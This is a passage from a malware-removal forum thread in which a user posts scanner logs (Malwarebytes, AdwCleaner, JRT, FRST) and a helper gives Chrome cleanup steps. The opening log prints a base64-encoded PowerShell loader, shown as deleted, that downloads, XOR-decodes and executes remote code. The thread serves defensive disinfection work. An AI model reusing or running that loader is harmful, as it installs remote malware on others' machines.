OQBBAEcAYwB1AGwARQBEAEQAQgBQAGQANABPAFoAdQBxAE0AbQBoAFgAMQBrAFcATQBhAEgAQgAtAGQAaQBTAC0AawBCAF8ANABwAG4AVgAwAHMAQwBUAE4ASQBMAE4AWQBXAGQAZABGADAAMQA1AEoARwA4AC0AVgB4ADUAMQA2AG0AawBLAE8ANAAyAGsATgBkAGsAMQA5AGcAMgBBAEMAUABzADAANQB1AG0AcgBhAG8AOABRADkAVAB5ADEAbwBqAEQAWAA1AF8AdwA4AGkANQBJAFEAYgBXADYAOABoAGkAdABTAHkAaQA4AGYAYgBBAGoANgBDAG8AdABlAEYAVABvAEMAbwBVAGMAQwBvAHQAVwA2AF8AeQBEAEoAQwBZAEIAMwA3ADAAdABsAHcAMgBEAEQAbABxAGsAVwBBAEYAZwBLAHYAYwB2AEoAWAB6AGwAcgBrAF8ATABPAHEARABCAG8AMABUAGoAZABBAFcAbABGADEAdQA5ADgAZgBJAEIAMwBvADIARABOAGcANAA5AHgAUwBFAG8AawByAFIAXwBWAEIAVABmAFcAUQBLAGEASgBJAFoANQBKAHQANgB6AHYAagA2ADUANwA3AGMANQB6AHcAdQBfAGIAOQBPAHQAYgBxAEoARwBBAGoAawBlADcAQwBDAFgAcABDAGkAUgBMADYARABaAEEAcQBEAFEAYQBRADkAawBDAGUAMABMAGoAegBmADcAUwB0AGMAQgBFAFIAbABKAEwAegBJAHIASgB2AGoAZQA1AE8AUQBEAFgAdQB4AEkAUwB1AHAANwBtADUAcwBHAEcAYgAtAEUATQAzAEIAZgBHAFUAVQBWAFAAMABQAGwATgBsAGgASABRAHcAbgB5AHgANwB3AGgALQBHAFAATwA5AGoAOQBSAFUANgBYADcAMAA5AC0AMwBOAHcASABwAGwAcwBuADUAawBuAGEAUAB0AGEAbwA4AE8AMgBhADAAWQBOAHgAdwBpAGsAbwBPAG0AZwBjAEsATwBxAFUAMwBtAGkATABVADQAQwBXAFoARgA2AGgANQB4AGUATQBUAC0ASABrAFcAOQBOAGUAMwA2AGEAOQBLAEgAQwB1ADIAZQBvAFgAMwBxAHYAQgBSAEkANwBRAHAAYwBmAFcAQQByAE4AZgA1AEQASQA0AGgAcwBsAGsAcgBsAEUAZwByAE8AeQA0ADkARgBTAHgAQwBfAE0AUQBUAG0AMABWAEoAWABKAFYAWgBPAHkAcABUADQAOQBXAFkAMQBQAHoAUQB5AE8AUQA2ADMAWgB6AFoASAA1AG8AbQBIAFUAWABXAG0ANwB6AE4AZwAtAHkANgBEAEIAbQA3AFIAOQBQAGoAcwBuAGUAUwAwAEUASgB6AFYAcwBKAEgAUQBpAEQATgBXAHIAbwA5AFgAUAA0ADcAeQB0AEkAaQBaAHEAbQB1AEgAZwA4AHgAeABkACYAYwA9AHIAWgB5AEQAeABHAF8AZAA0AFgANQAtADIAOAByAFMAbABnADcAdwBOAHoANwByAHgAXwBJAHYAcwB3AGoAZgB2AFAAMQB5AGQASwBwADAAdQBHAHQAOAA5AEoAQgBlAEQATgB0AC0AegAwAGwAagAyAGMAYQBpAGwAdwBxAEUAYwBaADEAeQBWAEcAbQBPAHQAcgBjAHoAcABHAFEANwBMAGMAdgA3AEgANQBSAGcAVgBaAHYAVQAtAEcAegBjAEkAbQA3AEgAUQAyADUAYgBLAEoAUABIAFYAUwBvADgAVgBuAEMAXwBUAEkAcwBEAEIAXwAwAG0AMAAxAFkALQB0AE0AawBWAGwATwBNAHMAbgBuAFUANgBXAEUAbQBQAGkAeQBOAHQAMgB5AGIAMAAwAGIAagAwAFgAWQBCAGgARQB0AHoAZwBMAGoASABMAEgATgAtAFcAeAAtAHoAQgAtAHUARABiAEEAYQA3AFUAVwA4AE8AagBnAFEAYQBqAEwANQA5AHoAUAB4ADkASgBYAHMAeQB2ADIALQBRAHAAagBIAHMATAB5AEoAWABMADUAcQB4ADEAZwBBAFcAeABTAE8AMgBtADgANAAtADAAMwBWAFQAYQA5AHMAYgBvAHUASwBBAGkAYgB3ADkAZwB6ADQAYQBvAFcAMQBEAEQAZgBJAFoAcQAyAHYAMwA2AFUAMgBFAFcATQBvAGMALQBuADgASABJAHUASQBFAHIARgBTAEYAVwBqAFIANQBnAEEARABZAFYAYQByAEQAMwBDAGQAOQBZAFAAUgBzADMAagA0AHkAZQBkAGUAUwBqADgAaABqAEEAYwBSADgAUQB6ADcAZABxAFYAaABXADgASABRAHAAeQBxAEkAegBUAGQAdgBOAFEAZQBmAEIASwBPAEQAOQBLAHoAMABNAEMAZQBBADIAeAA1AFAAUgAtAG0AcQA1AGsAbgBuADYAdQBuAGQAcgAyAGkARQBXAEUANQAtAGwAVgB0AE8AeABxAGgAQwBzAGYARwBFAGoASQBsAGYAeAA0AGwAdwA4AHIANABpAFgAUQBOAC0AagBSADUAMABlAGEAdwBUADUAWAA4AEgAOQAzAC0ASgB3AFAAdwBHAHIAWQBJAEQAOAAtAFIAcgBNADMARAA4AFQASABTAGcARABfAGEAcAB5ADUAdABTAEIAagBFAE4ARgBiAEIAdQBBAHIAawAtAHUASwBjAHQARABLAGYAZQBWAHEAbABQAEIAQgBQADQAagBCAF8AdgBUAFMAcABsAF8AMAA4AEoATABaAGwAMQBZAF8AOABzAFUAaABPAFIAYwBaAHAATQBGAHQAagB0AEkARAA2ADQAZABFAGYALQB3AFAAaQBlAE4AdABXADcAeQBQAFIANgBqAC0ANQBCAG4AcgB1AFUAQwBHADkAWABCAEMAaQBTAFMAZQBpAEQASQBTADgASABoAEwAeABHAHUAQQBkADIARwBRAGsAQwBlAHAAdABUAEQAawBLAFIAMQBqAEsAOAByAHEAMgBpAG8AUQA0ADMAZwAxAEoASQBkAGMAcgBJAHUANwBXAEYAbQB3AG8AQgBtADYAYQBBAF8AaQBUAHoAUwBfAFQAYgBtAFQAdgAwAF8AVwA5AEQAMQBqAEEASABDADUASgBVAHUAcwBWAEcAdQBsAEEAcQBxAE8ASwAxADIAUAAxAHAAMwBsAFAAOABiAGsAYQB3AGUAcABwAEkAOQBzAFQAdQAwAFMAdABZAG0AcgBHADkAMQBXAG0AVABQAEkAVgBnAFYAWQA5AGEASwAtAGkASgA0AEcAQgBvAE8ATwB4AGMAQwBGAFUAegBLADIAcwBlADEAMQBUAHIALQBfADkAYgBaAGkAVABOADAAOABkAEgAOABiAEUAbgB4AGsAQgBCAGYAOQB4AG0AZAB1AE8AOAB2AGoAaQAyAF8ASgAtAG0ARwBYAHgAeAAzAEoAawB4AEUAOAA5AC0AVwA0AE4ASwBFAFYASgAxAFIAYQBuAHkAYQA3AGYATAB6AFEAMQBoAFEAagBLAGQASwBtADYAegBkAGYAaQBVAGUAbQBxAHYAdgBwAHUAbABBAFYASwBuAHgAVABPAHYAaQBFADcAUgBmADcAQQBrAGQAegA4AHYATgBQAEcAUgBRADkAZABfAGgAQwAtAHgAVgBIAHEAdAB6AFIAdQBlAGcASgBEADMAQQBFAHkAdQBCAGIANQBlAG0AcgBJAEwAcQBIADIAMgA1AGkARABfAHoARgBuAFEALQBXAEoAagA0AGQAZQB0AEYAUABhADMAYQBmAFcATQBjAFYAeQBpAEwAcABoAHgASABmADkAeABSAFgAMwA3AHgAUABNAEoAdAA3AHUAYQBiAGIAMwBDAFAAWgBvAFcAQgBNADQATQBFAEsAVQBqAFIAcwAyAHQANgA0AEwAcwBiAEkAdgBRAG4AdgBwAGcAYwBjADQARQBaAHoAaQBkAEEAMgBEAEIAMABTAHQAeQAmAHIAPQA5ADAANAA1ADMANAAyADQANAA3ADUAMQA5ADIAOAA5ADAAMgA0ACIAOwAkAHMAdABzAGsAPQAiAHsAMABEADAAOAAwADQANAA3AC0ANwBGADAAOQAtADAAOQA3ADkALQAwAEYAMQAxAC0AMAA1ADAAQgAwAEYAMABEADEAMQAwAEQAfQAiADsAJABwAHIAaQBkAD0AIgBPAG4AZQBTAHkAcwB0AGUAbQBDAGEAcgBlACIAOwAkAGkAbgBpAGQAPQAiAEYASgBNAEkASwBLAE4ATQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==) -> Deleted
[Suspicious.Path|Tr.Gen1] \{8A254196-3D8E-F63D-E565-AD7C49709C85} -- C:\ProgramData\{5072ACE0-E7D9-1B4B-3712-1D14D15C2594}\D66BD8CC-61C0-6F67-DF41-48BB72D20D63.exe (/run) -> Deleted

¤¤¤ Files : 1 ¤¤¤
[Tr.Gen0][File] C:\Users\007\AppData\Local\Temp\a.txt -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 2 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : Shortcuts for Google? [baohinapilmkigilbbbcccncoljkdpnd] -> Deleted
[PUP.Gen1][Chrome:Config] Default [SecurePrefs] : session.startup_urls [http://www.google.com/ig|http://sea...FIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4=] -> Deleted

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: SAMSUNG MZMTD256HAGM-000L1 +++++
--- User ---
[MBR] 1ce281d9a91db9cd6964330fd9786dd3
[BSP] a323428ca19b553785feb26e6406398b : Empty|VT.Unknown MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 1000 MB
1 - [SYSTEM][MAN-MOUNT] EFI system partition | Offset (sectors): 2050048 | Size: 260 MB
2 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2582528 | Size: 1000 MB
3 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 4630528 | Size: 128 MB
4 - Basic data partition | Offset (sectors): 4892672 | Size: 225763 MB
5 - Basic data partition | Offset (sectors): 467255296 | Size: 4096 MB
6 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 475643904 | Size: 11950 MB
User = LL1 ... OK
User = LL2 ... OK

 

[shivmister]

So I ran malware bytes, quarantined the items (that was the only option, no remove option) and restarted the computer after it finished as it suggested. (You can ignore the rest of this paragraph.) When I tried to log back on, it would not log me into my account. It created a temporary default account. It said any changes I make to the temporary account will get deleted...I dont know if that means if I create a txt document and then restart and that gets deleted or any corrections I do to improve my situation gets deleted. All my files are still on my drive, but im not on my user account. I got a message that said if you sign out and sign back in it should fix the issue. It did not fix the issue. I even restarted the computer. I am now debating if I should continue with the rest of the scans.

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 3/3/17
Scan Time: 8:02 PM
Logfile: malwarebytes.txt
Administrator: Yes

-Software Information-
Version: 3.0.6.1469
Components Version: 1.0.75
Update Package Version: 1.0.1422
License: Trial

-System Information-
OS: Windows 10
CPU: x64
File System: NTFS
User: Shivang\007

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 411591
Time Elapsed: 2 min, 58 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 3
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E, Quarantined, [46], [260247],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E, Quarantined, [46], [260247],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{ea2cb491}, Quarantined, [46], [260250],1.0.1422

Registry Value: 3
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{ea2cb491}|1, Quarantined, [46], [260250],1.0.1422
Trojan.DNSChanger.ACMB2, HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}|NameServer, Quarantined, [7700], [260227],1.0.1422
Trojan.DNSChanger.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\INTERFACES\{233b3be6-3a13-4215-9df0-79c7b19ef857}|NAMESERVER, Quarantined, [7700], [260227],1.0.1422

Registry Data: 14
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{0d251055-31ed-48ea-b574-65a04995c8e1}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{53DD74C5-F1D5-44B3-BC64-FE64C0F20AF1}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{adee8c85-6405-43ab-b5ce-70bbec9c5305}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{e5a2d9d9-828e-453f-8fae-e6e1988b15eb}|NameServer, Replaced, [46], [-1],0.0.0
Trojan.DNSChanger.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NAMESERVER, Replaced, [7700], [293494],1.0.1422

Data Stream: 0
(No malicious items detected)

Folder: 4
PUP.Optional.DNSUnlocker.ACMB2, C:\PROGRAMDATA\d949e265-3795-0, Quarantined, [46], [182288],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, C:\PROGRAMDATA\{43520dcd-612c-1}, Quarantined, [46], [182289],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, C:\PROGRAMDATA\{5c8f6aa7-612c-0}, Quarantined, [46], [182289],1.0.1422
Adware.Agent.Generic, C:\PROGRAMDATA\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}, Quarantined, [1716], [331038],1.0.1422

File: 10
PUP.Optional.DNSUnlocker.ACMB2, C:\WINDOWS\SYSTEM32\TASKS\{087F0D47-047E-057E-7911-7879097A110A}, Quarantined, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\{43520dcd-612c-1}\BITC085.tmp, Quarantined, [46], [182289],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\{5c8f6aa7-612c-0}\BITC0E4.tmp, Quarantined, [46], [182289],1.0.1422
Adware.Elex, C:\PROGRAMDATA\EA2CB491\DDB08C37.DLL, Quarantined, [305], [375719],1.0.1422
Adware.Agent.Generic, C:\PROGRAMDATA\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.EXE, Quarantined, [1716], [331038],1.0.1422
PUP.Optional.CrossRider, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [307], [256629],1.0.1422
PUP.Optional.CrossRider, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [307], [256629],1.0.1422
PUP.Optional.Yontoo, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_static.coupontime00.coupontime.co_0.localstorage, Quarantined, [71], [304355],1.0.1422
PUP.Optional.Yontoo, C:\PROGRAMDATA\NTUSER.POL, Removal Failed, [71], [-1],0.0.0
PUP.Optional.Yontoo, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_static.coupontime00.coupontime.co_0.localstorage-journal, Quarantined, [71], [304355],1.0.1422

Physical Sector: 0
(No malicious items detected)


(end)

 

[shivmister]

So I decided to run AdwCleaner. Couple files were found that needed to be cleaned. The program suggested to restart which I did. This time I was able to log back in under my account. I will post the contents of the next log as soon as I finish running it.


# AdwCleaner v6.044 - Logfile created 03/03/2017 at 20:55:56
# Updated on 28/02/2017 by Malwarebytes
# Database : 2017-03-02.1 [Server]
# Operating System : Windows 10 Home (X64)
# Username : 007 - SHIVANG
# Running from : C:\Users\007\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\ProgramData\ea2cb491


***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [3119 Bytes] - [23/01/2017 19:36:06]
C:\AdwCleaner\AdwCleaner[C2].txt - [1604 Bytes] - [26/01/2017 04:51:07]
C:\AdwCleaner\AdwCleaner[C3].txt - [1026 Bytes] - [03/03/2017 20:55:56]
C:\AdwCleaner\AdwCleaner[S0].txt - [3240 Bytes] - [23/01/2017 19:34:25]
C:\AdwCleaner\AdwCleaner[S1].txt - [1685 Bytes] - [26/01/2017 04:50:05]
C:\AdwCleaner\AdwCleaner[S2].txt - [1487 Bytes] - [03/03/2017 20:35:07]

########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1318 Bytes] ##########

 

[shivmister]

This program ran with no issues.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.1 (02.11.2017)
Operating System: Windows 10 Home x64
Ran by 007 (Administrator) on Fri 03/03/2017 at 21:10:31.34
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 1

Successfully deleted: C:\Users\007\desktop\Continue Blaze ImgConvert Installation.lnk (File)



Registry: 1

Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 03/03/2017 at 21:12:16.19
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

[Broni]

How is Chrome doing at the moment?

 

[shivmister]

So, other than the fact that I no longer see my bookmarks toolbar, it seems to be running alright so far. I can click on the above links without being redirected to some random page telling me I have a virus. Once again I should mention up until the recently the pop ups to random websites were coming maybe few times a day. I will continue using it and see what happens.

 

[Broni]

Just in case it happens again...

Reset Chrome...
Click on "Customize and control Google Chrome":

Click "Settings" then "Show advanced settings" at the bottom of the screen.
Click "Reset browser settings" button.
Restart Chrome.

If the above didn't help....

Reinstall Chrome...
If you want to save your bookmarks...
How to Backup Bookmarks in Google Chrome
If you want to save your passwords as well see here: http://www.intowindows.com/how-to-backup-saved-passwords-in-google-chrome-browser/

• Close all Chrome windows and tabs.
• Go to the Start menu > Control Panel. (Windows 8 users: Learn how to access the Control Panel)
• Click Programs and Features.
• Double-click Google Chrome.
• Click Uninstall from the confirmation dialog. Delete your user profile information, like your browser preferences, bookmarks, and history, by selecting the "Also delete your browsing data" checkbox.

Install fresh copy.

====================================

As for bookmarks toolbar see if this will help: https://www.lifewire.com/how-to-always-show-the-google-chrome-bookmarks-bar-4103621

Next...

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

• Double click to run it.
• Make sure you checkmark Addition.txt box.
• Press Scan button.
• Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

 

[shivmister]

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-10-2015
Ran by 007 (administrator) on SHIVANG (03-03-2017 21:55:50)
Running from C:\Users\007\Desktop
Loaded Profiles: 007 (Available Profiles: 007)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
